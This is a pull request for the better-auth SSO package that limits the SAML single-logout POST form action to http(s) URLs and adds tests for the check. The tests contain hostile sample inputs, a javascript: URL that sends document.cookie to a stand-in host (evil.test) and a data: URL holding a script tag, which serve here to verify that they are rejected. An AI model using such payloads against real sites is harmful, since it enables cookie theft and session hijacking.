### PR TITLE
fix(sso): restrict SAML SLO POST form action to http(s) schemes

### DIFF
--- a/.changeset/sso-saml-slo-form-action-scheme.md
+++ b/.changeset/sso-saml-slo-form-action-scheme.md
@@ -1,0 +1,5 @@
+---
+"@better-auth/sso": patch
+---
+
+The SAML single-logout POST form now only emits http(s) URLs into the form `action`, rejecting `javascript:`/`data:` IdP SLO locations.

--- a/.changeset/sso-saml-slo-form-action-scheme.md
+++ b/.changeset/sso-saml-slo-form-action-scheme.md
@@ -2,4 +2,4 @@
 "@better-auth/sso": patch
 ---
 
-The SAML single-logout POST form now only emits http(s) URLs into the form `action`, rejecting `javascript:`/`data:` IdP SLO locations.
+SAML single logout now rejects IdP SLO POST URLs that use non-http(s) schemes, such as `javascript:` or `data:`.

--- a/packages/sso/src/routes/helpers.test.ts
+++ b/packages/sso/src/routes/helpers.test.ts
@@ -1,5 +1,26 @@
+import { APIError } from "better-auth/api";
 import { describe, expect, it } from "vitest";
 import { createSAMLPostForm } from "./helpers";
+
+const invalidSAMLBindingLocationMessage =
+	"SAML POST binding location must be an absolute http or https URL";
+
+function expectInvalidSAMLBindingLocation(action: string) {
+	try {
+		createSAMLPostForm(action, "SAMLResponse", "base64value");
+		expect.unreachable();
+	} catch (error) {
+		expect(error).toBeInstanceOf(APIError);
+		expect(error).toMatchObject({
+			status: "BAD_REQUEST",
+			statusCode: 400,
+			message: invalidSAMLBindingLocationMessage,
+			body: {
+				message: invalidSAMLBindingLocationMessage,
+			},
+		});
+	}
+}
 
 describe("createSAMLPostForm", () => {
 	it("emits an http(s) form action", async () => {
@@ -13,22 +34,12 @@ describe("createSAMLPostForm", () => {
 	});
 
 	it("rejects a javascript: form action", () => {
-		expect(() =>
-			createSAMLPostForm(
-				"javascript:fetch('https://evil.test/x?c='+document.cookie)",
-				"SAMLResponse",
-				"base64value",
-			),
-		).toThrow();
+		expectInvalidSAMLBindingLocation(
+			"javascript:fetch('https://evil.test/x?c='+document.cookie)",
+		);
 	});
 
 	it("rejects a data: form action", () => {
-		expect(() =>
-			createSAMLPostForm(
-				"data:text/html,<script>1</script>",
-				"SAMLResponse",
-				"base64value",
-			),
-		).toThrow();
+		expectInvalidSAMLBindingLocation("data:text/html,<script>1</script>");
 	});
 });

--- a/packages/sso/src/routes/helpers.test.ts
+++ b/packages/sso/src/routes/helpers.test.ts
@@ -1,0 +1,34 @@
+import { describe, expect, it } from "vitest";
+import { createSAMLPostForm } from "./helpers";
+
+describe("createSAMLPostForm", () => {
+	it("emits an http(s) form action", async () => {
+		const res = createSAMLPostForm(
+			"https://idp.example.com/slo",
+			"SAMLResponse",
+			"base64value",
+		);
+		const html = await res.text();
+		expect(html).toContain('action="https://idp.example.com/slo"');
+	});
+
+	it("rejects a javascript: form action", () => {
+		expect(() =>
+			createSAMLPostForm(
+				"javascript:fetch('https://evil.test/x?c='+document.cookie)",
+				"SAMLResponse",
+				"base64value",
+			),
+		).toThrow();
+	});
+
+	it("rejects a data: form action", () => {
+		expect(() =>
+			createSAMLPostForm(
+				"data:text/html,<script>1</script>",
+				"SAMLResponse",
+				"base64value",
+			),
+		).toThrow();
+	});
+});

--- a/packages/sso/src/routes/helpers.ts
+++ b/packages/sso/src/routes/helpers.ts
@@ -140,7 +140,7 @@ function escapeHtml(str: string | undefined | null): string {
 		.replace(/'/g, "&#39;");
 }
 
-function isHttpUrl(value: string): boolean {
+function isSAMLPostBindingLocation(value: string): boolean {
 	let url: URL;
 	try {
 		url = new URL(value);
@@ -158,9 +158,10 @@ export function createSAMLPostForm(
 ): Response {
 	// `action` is an IdP-supplied endpoint (e.g. the SLO Location); only emit
 	// http(s) URLs into the auto-submitting form.
-	if (!isHttpUrl(action)) {
+	if (!isSAMLPostBindingLocation(action)) {
 		throw new APIError("BAD_REQUEST", {
-			message: "Invalid SAML binding location",
+			message:
+				"SAML POST binding location must be an absolute http or https URL",
 		});
 	}
 	const safeAction = escapeHtml(action);

--- a/packages/sso/src/routes/helpers.ts
+++ b/packages/sso/src/routes/helpers.ts
@@ -1,4 +1,5 @@
 import type { DBAdapter } from "@better-auth/core/db/adapter";
+import { APIError } from "better-auth/api";
 import { saml } from "../samlify";
 import type { SAMLConfig, SSOOptions, SSOProvider } from "../types";
 import { normalizePem, safeJsonParse } from "../utils";
@@ -139,12 +140,29 @@ function escapeHtml(str: string | undefined | null): string {
 		.replace(/'/g, "&#39;");
 }
 
+function isHttpUrl(value: string): boolean {
+	let url: URL;
+	try {
+		url = new URL(value);
+	} catch {
+		return false;
+	}
+	return url.protocol === "http:" || url.protocol === "https:";
+}
+
 export function createSAMLPostForm(
 	action: string,
 	samlParam: string,
 	samlValue: string,
 	relayState?: string,
 ): Response {
+	// `action` is an IdP-supplied endpoint (e.g. the SLO Location); only emit
+	// http(s) URLs into the auto-submitting form.
+	if (!isHttpUrl(action)) {
+		throw new APIError("BAD_REQUEST", {
+			message: "Invalid SAML binding location",
+		});
+	}
 	const safeAction = escapeHtml(action);
 	const safeSamlParam = escapeHtml(samlParam);
 	const safeSamlValue = escapeHtml(samlValue);


### PR DESCRIPTION
An IdP-supplied SAML SLO `Location` could be rendered as the `action` for the auto-submitting POST binding form even when it used a browser-executable scheme.

This validates the SAML POST binding location at the form-rendering boundary before the response is emitted. The check stays at the sink because SLO locations can come from parsed IdP metadata or explicit configuration, and the form helper is the shared place where those values become browser navigation targets.

Only absolute `http` and `https` locations are accepted; other schemes fail as bad SAML binding locations instead of being escaped into HTML.
